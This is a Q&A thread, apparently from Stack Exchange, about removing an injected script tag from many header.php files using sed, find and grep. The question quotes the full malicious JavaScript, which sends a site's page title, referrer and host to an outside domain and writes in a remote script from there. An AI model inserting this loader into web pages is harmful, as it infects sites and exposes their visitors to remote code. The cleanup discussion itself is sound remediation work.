# How to remove a script tag from a text file with sed

Tags: shell, sed, php, malware

I have a number of header.php files that have a malicious script tag contained within them (don't ask). I've written a not-so-elegant shell script to replace these with blank space. I had initially tried to subtract the payload from the header.php but this didn't seem possible as the file was not a sorted list. Below is my code:

```
echo 'Find all header.php files'
find -name header.php -print0 > tempheader
echo 'Remove malware script from headers'
cat tempheader | xargs -0 sed -i 's/\<script\>var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "http:\/\/someplacedodgy.kr\/js\/jquery.min.php"; var n_url = base + "?default_keyword=" + default_keyword + "\&se_referrer=" + se_referrer + "\&source=" + host; var f_url = base + "?c_utt=snt2014\&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null \&\& default_keyword !== '' \&\& se_referrer !== null \&\& se_referrer !== ''){document.write('\<script type="text\/javascript" src="' + f_url + '"\>' + '\<' + '\/script\>');}\<\/script\>/ /g'
```

The issue is that this code fails to execute with the error: `sed: -e expression #1, char 578: unterminated`s' command`. My assumption is that there are unescaped characters causing this issue, I have tried escaping all <> and {}'s, however this didn't seem to help (note the <> are still escaped above).

If there is a way to input a file containing the string into sed like `sed -i 's/$payload/ /g'` I have not been able to work that out yet.

Comment: `printf %s\\n "$payload" | sed 's/[]/\.$^[]/\\&/g;s|.*|s/&/ /g|' | sed -f-`

Comment: Can you explain that, I don't see how that'd replace the above string with blank space in the file header.php. Will it autoescape the contents of a script file specified after -f? Thanks.

Comment: it will escape any regexp metachars in `$payload` and transform the escaped result into a `sed` `s///`ubstitution.

Comment: On decent implementations, you can use any 7-bit character in place of `/`, so `s|from|to|flags` instead of `s/from/to/flags`, which might help with the quoting nightmare.

Comment: see [this](http://unix.stackexchange.com/a/251521/52934). @UlrichSchwarz - you can do that with any `sed` - but that isn't a solution, it's a workaround and it's just going to screw up too. To use syntax characters literally in any language you have to quote them.

Comment: @UlrichSchwarz I tried replacing / with # and I get a seperate problem in that it tries to read script as a file. Like below:
    's#\<script\>var a=''; setTimeout(10);.....

Comment: `git reset --hard COMMIT`?

Comment: @mikeserv: yes, but's it's a good idea not choose a metacharacter that's all over the place in teh domain you're working on. (And I've seen Windows implementations of `sed` that didn't support it.)

Comment: @UlrichSchwarz - yeah, ok, that's true. it's just that the delimiter isn't the only one - there are several characters significant to regexp, and most of them don't gen syntax errors when placed in a regexp unintentionally - they just cause the code to do other than what is intended. if you want to put arbitrary variable data in regular expressions you have to escape it. when you're the writing the expression you use whatever you want - when you generate it you have to machine parse it.

Answer (score 0, accepted):

If, as your answer says, the payload is on a single line by itself, this will do it, while creating backups of the files altered:

```
find -name header.php -exec sed -i.bak '/someplacedodgy\.kr\/js\/jquery.min.php/d' {} \; -ls
```

Just be sure that the "someplacedodgy" string is unique to the payload lines.

Omit the .bak from -i.bak if you wish to skip the backups.

Answer (score 0):

I worked out an easier solution to this issue as the string was contained on a line by itself.

```
while read HEADER 
do cat $HEADER | grep -vw "somewheredodgy.kr/js/jquery.min.php"; > modifiedheader 
cp modifiedheader $HEADER 
done < tempheader
```